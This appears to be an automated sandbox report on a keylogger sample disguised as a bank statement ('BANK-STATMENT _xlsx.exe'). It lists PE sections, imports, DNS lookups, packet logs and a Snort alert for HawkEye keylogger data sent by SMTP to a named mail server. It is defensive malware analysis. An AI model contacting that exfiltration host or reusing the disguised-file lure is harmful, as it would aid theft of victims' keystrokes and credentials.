                                                                              BSS     0x87000          0xc79         0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .idata  0x88000          0x247a        0x2600    False     0.350637335526   data       4.93470816555  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .tls    0x8b000          0x10          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .rdata  0x8c000          0x18          0x200     False     0.048828125      data       0.20058190744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .reloc  0x8d000          0x7044        0x7200    False     0.581483004386   data       6.62684722592  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .rsrc   0x95000          0x5bc5c       0x5be00   False     0.887537202381   data       7.51848710017  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              Name       RVA      Size     Type  Language  Country
                                                                              RT_CURSOR  0x96250  0x134    data
                                                                              RT_CURSOR  0x96384  0x134    data
                                                                              RT_CURSOR  0x964b8  0x134    data
                                                                              RT_CURSOR  0x965ec  0x134    data
                                                                              RT_CURSOR  0x96720  0x134    data
                                                                              RT_CURSOR  0x96854  0x134    data
                                                                              RT_CURSOR  0x96988  0x134    data
                                                                              RT_BITMAP  0x96abc  0x1d0    data
                                                                              RT_BITMAP  0x96c8c  0x1e4    data
                                                                              RT_BITMAP  0x96e70  0x1d0    data
                                                                              RT_BITMAP  0x97040  0x1d0    data
                                                                              RT_BITMAP  0x97210  0x1d0    data
                                                                              RT_BITMAP  0x973e0  0x1d0    data
                                                                              RT_BITMAP  0x975b0  0x1d0    data
                                                                              RT_BITMAP  0x97780  0x1d0    data
                                                                              RT_BITMAP  0x97950  0x53c6e  data  English   United States
                                                                              RT_BITMAP  0xeb5c0  0x1d0    data
                                                                              RT_BITMAP  0xeb790  0xd8     data
                                                                              RT_BITMAP  0xeb868  0x128    data
                                                                              RT_BITMAP  0xeb990  0x128    data
                                                                              RT_BITMAP  0xebab8  0x128    data
                                                                              RT_BITMAP  0xebbe0  0xe8     data
                                                                              RT_BITMAP  0xebcc8  0x128    data
                                                                              RT_BITMAP  0xebdf0  0x128    data
                                                                              RT_BITMAP  0xebf18  0xd0     data
                                                                              RT_BITMAP  0xebfe8  0x128    data
                                                                              RT_BITMAP  0xec110  0x128    data
                                                                              RT_BITMAP  0xec238  0x128    data
                                                                              RT_BITMAP  0xec360  0x128    data
                                                                              RT_BITMAP  0xec488  0x128    data
                                                                              RT_BITMAP  0xec5b0  0xe8     data
                                                                              RT_BITMAP  0xec698  0x128    data
                                                                              RT_BITMAP  0xec7c0  0x128    data
                                                                              RT_BITMAP  0xec8e8  0xd0     data
                                                                              RT_BITMAP  0xec9b8  0x128    data
                                                                              RT_BITMAP  0xecae0  0x128    data
                                                                              RT_BITMAP  0xecc08  0x128    data
                                                                              RT_BITMAP  0xecd30  0x128    data
                                                                              RT_BITMAP0xece580x128data
                                                                              RT_BITMAP0xecf800xe8data
                                                                              RT_BITMAP0xed0680x128data
                                                                              RT_BITMAP0xed1900x128data
                                                                              RT_BITMAP0xed2b80xd0data
                                                                              RT_BITMAP0xed3880x128data
                                                                              RT_BITMAP0xed4b00x128data
                                                                              RT_BITMAP0xed5d80xd8data
                                                                              RT_BITMAP0xed6b00xd8data
                                                                              RT_BITMAP0xed7880xd8data
                                                                              RT_BITMAP0xed8600xd8data
                                                                              RT_ICON0xed9380x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                              RT_STRING0xedea00xdcdata
                                                                              RT_STRING0xedf7c0x2d8data
                                                                              RT_STRING0xee2540xd8data
                                                                              RT_STRING0xee32c0x160data
                                                                              RT_STRING0xee48c0x218data
                                                                              RT_STRING0xee6a40x470data
                                                                              RT_STRING0xeeb140x380data
                                                                              RT_STRING0xeee940x394data
                                                                              RT_STRING0xef2280x418data
                                                                              RT_STRING0xef6400xf4data
                                                                              RT_STRING0xef7340xc4data
                                                                              RT_STRING0xef7f80x2e0data
                                                                              RT_STRING0xefad80x35cdata
                                                                              RT_STRING0xefe340x2b4data
                                                                              RT_RCDATA0xf00e80x10data
                                                                              RT_RCDATA0xf00f80x224data
                                                                              RT_RCDATA0xf031c0x807Delphi compiled form 'TForm1'
                                                                              RT_GROUP_CURSOR0xf0b240x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b4c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b600x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b740x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b880x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b9c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_ICON0xf0bb00x14dataEnglishUnited States
                                                                              RT_HTML0xf0bc40x98dataEnglishUnited States

                                                                              Imports

DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
kernel32.dll | MulDiv
winmm.dll | mciSendCommandA, mciGetErrorStringA
kernel32.dll | AddVectoredExceptionHandler

                                                                              Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                              Network Behavior

                                                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/19/20-16:03:11.245137 | TCP | 2019926 | ET TROJAN HawkEye Keylogger Report SMTP | 49746 | 587 | 192.168.2.4 | 166.62.27.57

                                                                              TCP Packets

                                                                              Nov 19, 2020 16:04:22.257847071 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.274291992 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.274451971 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.275377035 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.291771889 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.298597097 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.347043037 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.352025032 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.367753029 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.367882967 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.457828999 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.482532024 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483330011 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483397007 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483851910 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.486628056 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.490082026 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.502929926 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.506427050 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.506551027 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.507467031 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.523807049 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.525458097 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.525579929 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.528492928 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.530241013 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.546571016 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:29.671349049 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:35.992441893 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.008863926 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.009018898 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.009860039 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.026127100 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.037992001 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.084880114 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.101201057 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.101335049 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.178476095 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.181164980 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.195301056 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196178913 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196502924 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196562052 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.198659897 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.200278044 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.214926958 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.216463089 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.216552019 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.217386007 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.233619928 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238141060 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238523960 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238586903 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.241364956 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.257617950 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:43.404752970 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.284856081 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.301214933 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.301645041 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.301661015 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.320461035 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.330806971 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.385196924 CET4979480192.168.2.4104.16.154.36

                                                                              UDP Packets


                                                                              DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Nov 19, 2020 16:02:53.947966099 CET | 192.168.2.4 | 8.8.8.8 | 0x1630 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:02:54.437556982 CET | 192.168.2.4 | 8.8.8.8 | 0xb1c | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:02:54.565713882 CET | 192.168.2.4 | 8.8.8.8 | 0x3b3c | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:03:08.569644928 CET | 192.168.2.4 | 8.8.8.8 | 0x1187 | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:03:42.565202951 CET | 192.168.2.4 | 8.8.8.8 | 0xa237 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:03:42.855329990 CET | 192.168.2.4 | 8.8.8.8 | 0x1544 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:03:42.963808060 CET | 192.168.2.4 | 8.8.8.8 | 0x9d9e | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:03:56.284164906 CET | 192.168.2.4 | 8.8.8.8 | 0xabe9 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:03:58.046384096 CET | 192.168.2.4 | 8.8.8.8 | 0xf967 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:03:58.168235064 CET | 192.168.2.4 | 8.8.8.8 | 0xc658 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:10.725539923 CET | 192.168.2.4 | 8.8.8.8 | 0x5c45 | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:21.843602896 CET | 192.168.2.4 | 8.8.8.8 | 0x2ed2 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:04:22.194811106 CET | 192.168.2.4 | 8.8.8.8 | 0x93bd | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:22.309029102 CET | 192.168.2.4 | 8.8.8.8 | 0x693a | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:35.599082947 CET | 192.168.2.4 | 8.8.8.8 | 0x3a36 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:04:35.926879883 CET | 192.168.2.4 | 8.8.8.8 | 0x5b58 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:36.047477961 CET | 192.168.2.4 | 8.8.8.8 | 0x4193 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:47.181365967 CET | 192.168.2.4 | 8.8.8.8 | 0x9317 | Standard query (0) | 201.75.14.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Nov 19, 2020 16:04:47.244704962 CET | 192.168.2.4 | 8.8.8.8 | 0xce8d | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |
| Nov 19, 2020 16:04:47.332782984 CET | 192.168.2.4 | 8.8.8.8 | 0xf3c1 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001) |

                                                                              DNS Answers

                                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                              Nov 19, 2020 16:02:53.983439922 CET | 8.8.8.8 | 192.168.2.4 | 0x1630 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.475153923 CET | 8.8.8.8 | 192.168.2.4 | 0xb1c | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.475153923 CET | 8.8.8.8 | 192.168.2.4 | 0xb1c | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.592853069 CET | 8.8.8.8 | 192.168.2.4 | 0x3b3c | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.592853069 CET | 8.8.8.8 | 192.168.2.4 | 0x3b3c | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:08.608561039 CET | 8.8.8.8 | 192.168.2.4 | 0x1187 | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.601363897 CET | 8.8.8.8 | 192.168.2.4 | 0xa237 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.890909910 CET | 8.8.8.8 | 192.168.2.4 | 0x1544 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.890909910 CET | 8.8.8.8 | 192.168.2.4 | 0x1544 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:43.004244089 CET | 8.8.8.8 | 192.168.2.4 | 0x9d9e | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:43.004244089 CET | 8.8.8.8 | 192.168.2.4 | 0x9d9e | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:56.319935083 CET | 8.8.8.8 | 192.168.2.4 | 0xabe9 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.082009077 CET | 8.8.8.8 | 192.168.2.4 | 0xf967 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.082009077 CET | 8.8.8.8 | 192.168.2.4 | 0xf967 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.204073906 CET | 8.8.8.8 | 192.168.2.4 | 0xc658 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.204073906 CET | 8.8.8.8 | 192.168.2.4 | 0xc658 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:10.771277905 CET | 8.8.8.8 | 192.168.2.4 | 0x5c45 | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:21.879123926 CET | 8.8.8.8 | 192.168.2.4 | 0x2ed2 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.230504036 CET | 8.8.8.8 | 192.168.2.4 | 0x93bd | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.230504036 CET | 8.8.8.8 | 192.168.2.4 | 0x93bd | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.344558001 CET | 8.8.8.8 | 192.168.2.4 | 0x693a | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.344558001 CET | 8.8.8.8 | 192.168.2.4 | 0x693a | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.634669065 CET | 8.8.8.8 | 192.168.2.4 | 0x3a36 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.962539911 CET | 8.8.8.8 | 192.168.2.4 | 0x5b58 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.962539911 CET | 8.8.8.8 | 192.168.2.4 | 0x5b58 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:36.082937956 CET | 8.8.8.8 | 192.168.2.4 | 0x4193 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:36.082937956 CET | 8.8.8.8 | 192.168.2.4 | 0x4193 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.216671944 CET | 8.8.8.8 | 192.168.2.4 | 0x9317 | Name error (3) | 201.75.14.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.279954910 CET | 8.8.8.8 | 192.168.2.4 | 0xce8d | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.279954910 CET | 8.8.8.8 | 192.168.2.4 | 0xce8d | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.368083954 CET | 8.8.8.8 | 192.168.2.4 | 0xf3c1 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.368083954 CET | 8.8.8.8 | 192.168.2.4 | 0xf3c1 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • whatismyipaddress.com

                                                                              HTTP Packets

                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              0 | 192.168.2.4 | 49738 | 104.16.154.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:02:54.517074108 CET | 1095 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
